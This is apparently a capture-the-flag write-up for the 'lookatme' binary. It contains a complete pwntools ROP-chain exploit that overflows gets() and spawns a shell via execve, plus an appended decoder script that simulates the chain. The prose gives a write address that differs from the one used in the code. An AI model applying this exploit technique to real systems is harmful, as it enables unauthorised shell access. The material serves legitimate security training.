checksec
32bit
statically linked
not stripped
Pseudo Code
Uses the gets() function ==> vulnerable to overflow
v1 sits at ebp - 18h ==> filling 0x18 + SFP(4) bytes with dummy data lets us overwrite the return address
Execution
Payload
Finding function addresses
gets address = 0x804f120
mprotect address = 0x806e0f0
Writable area
.bss = 0x80eaf80 >> write "/bin/sh\x00" at 0x80eab000
gadget
int 0x80 ; ret ; = 0x806f630
pop eax ; ret ; = 0x80b81c6
pop ebx ; ret ; = 0x80481c9
pop ecx ; ret ; = 0x80de955
pop edx ; ret ; = 0x806f02a
exploit (1) - passing arguments to execve()
execve(address of "/bin/sh", NULL, NULL)
from pwn import *
#context.log_level = 'debug'
elf = ELF("./lookatme")
p = remote("ctf.j0n9hyun.xyz", 3017)

binsh = b"/bin/sh\x00"

# gadgets: pop reg ; ret  and  int 0x80 ; ret
pa = 0x80b81c6        # pop eax ; ret
pb = 0x80481c9        # pop ebx ; ret
pc = 0x80de955        # pop ecx ; ret
pd = 0x806f02a        # pop edx ; ret
int80 = 0x806f630     # int 0x80 ; ret
gets = 0x804f120
writable = 0x80eb000  # writable address that will hold "/bin/sh\x00"

pl = b"A" * (0x18 + 4)   # buffer (0x18) + SFP (4) up to the return address
pl += p32(gets)          # 1) gets(writable): read "/bin/sh\x00" into memory
pl += p32(pa)            #    gets returns into pop eax ; ret, which consumes the argument below
pl += p32(writable)      #    argument to gets (popped into eax and discarded)
pl += p32(pa)            # 2) eax = 0xb (execve)
pl += p32(0xb)
pl += p32(pd)            #    edx = 0
pl += p32(0)
pl += p32(pc)            #    ecx = 0
pl += p32(0)
pl += p32(pb)            #    ebx = address of "/bin/sh"
pl += p32(writable)
pl += p32(int80)         # 3) int 0x80 -> execve("/bin/sh", 0, 0)

p.sendlineafter(b"\n", pl)
p.sendline(binsh)        # consumed by the gets() call inside the chain
p.interactive()
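Added example, not part of the original writeup: a small decoder that walks the chain above using the gadget table from this post, so you can see (for instance when analysing a captured payload) how the first pop eax ; ret swallows the gets() argument and what register state reaches int 0x80. The gadget and function addresses are the ones listed above; the register-state model is an assumption of this example, not output of any tool.

```python
import struct

# Gadget table from the writeup: address -> registers popped before ret.
GADGETS = {
    0x80b81c6: ["eax"],   # pop eax ; ret
    0x80481c9: ["ebx"],   # pop ebx ; ret
    0x80de955: ["ecx"],   # pop ecx ; ret
    0x806f02a: ["edx"],   # pop edx ; ret
    0x806f630: [],        # int 0x80 ; ret
}
INT80 = 0x806f630
GETS = 0x804f120
WRITABLE = 0x80eb000
SYSCALLS = {0xb: "execve"}   # only the number this chain uses

def walk_chain(chain: bytes, gets_addr: int = GETS):
    """Simulate the chain from the overwritten return address onward.

    Returns (registers, syscall_name, gets_target). Assumes the model
    in the writeup: gets(dst) returns into the next word, and the word
    after that is its argument, which a 'pop ; ret' gadget then discards.
    """
    words = list(struct.unpack("<%dI" % (len(chain) // 4), chain))
    regs, gets_target, i = {}, None, 0
    while i < len(words):
        addr, i = words[i], i + 1
        if addr == gets_addr:
            gets_target = words[i + 1]   # gets(dst): dst sits after the fake return
            continue                     # ret lands on words[i], the pop gadget
        if addr == INT80:
            name = SYSCALLS.get(regs.get("eax"), "unknown")
            return regs, name, gets_target
        for reg in GADGETS[addr]:        # each pop consumes one stack word
            regs[reg] = words[i]
            i += 1
    return regs, None, gets_target

def lookatme_chain() -> bytes:
    """The chain from this post, without the 0x18 + 4 bytes of padding."""
    pa, pb, pc, pd = 0x80b81c6, 0x80481c9, 0x80de955, 0x806f02a
    words = [GETS, pa, WRITABLE, pa, 0xb, pd, 0, pc, 0, pb, WRITABLE, INT80]
    return struct.pack("<%dI" % len(words), *words)

if __name__ == "__main__":
    regs, sc, tgt = walk_chain(lookatme_chain())
    print("gets() writes to %#x; %s(ebx=%#x, ecx=%#x, edx=%#x)"
          % (tgt, sc, regs["ebx"], regs["ecx"], regs["edx"]))
```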